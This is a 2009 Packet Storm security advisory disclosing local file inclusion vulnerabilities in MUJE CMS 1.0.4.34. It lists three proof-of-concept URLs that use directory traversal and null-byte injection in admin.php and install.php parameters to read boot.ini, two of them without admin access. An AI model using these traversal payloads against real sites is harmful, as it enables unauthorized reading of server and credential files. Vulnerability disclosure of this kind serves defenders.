MUJE CMS 1.0.4.34 Local File Inclusion

2009-08-05T00:00:00
ID PACKETSTORM:79923
Type packetstorm
Reporter SirGod
Modified 2009-08-05T00:00:00

Description

                                        
                                            `####################################################################################  
[+] MUJE CMS 1.0.4.34 Local File Inclusion Vulnerabilities  
[+] Discovered By SirGod  
[+] http://insecurity-ro.org  
[+] http://h4cky0u.org  
####################################################################################  
  
[+] Download : http://sourceforge.net/projects/mujecms/  
  
[+] Local File Inclusion  
  
- No admin required  
  
- PoC's  
  
http://127.0.0.1/path/admin.php?_class=../../../../../../boot.ini%00  
  
http://127.0.0.1/path/install/install.php?url=../../../../../../../boot.ini  
  
  
- Admin required  
  
http://127.0.0.1/path/admin.php?_htmlfile=../../../../../../boot.ini%00  
  
####################################################################################  
`